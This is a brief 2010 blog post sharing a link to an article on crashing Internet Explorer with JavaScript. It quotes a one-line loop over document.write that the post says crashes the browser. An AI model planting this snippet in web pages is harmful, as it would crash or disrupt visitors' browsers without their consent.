Nov 22 2010
How to Crash IE with JavaScript – Jeff Bail
Link: How to Crash IE with JavaScript – Jeff Bail
How might you do that? Glad you asked. Using JavaScript, it’s dead simple:
for (d in document.write) { document.write(d); }
Comments Off on How to Crash IE with JavaScript – Jeff Bail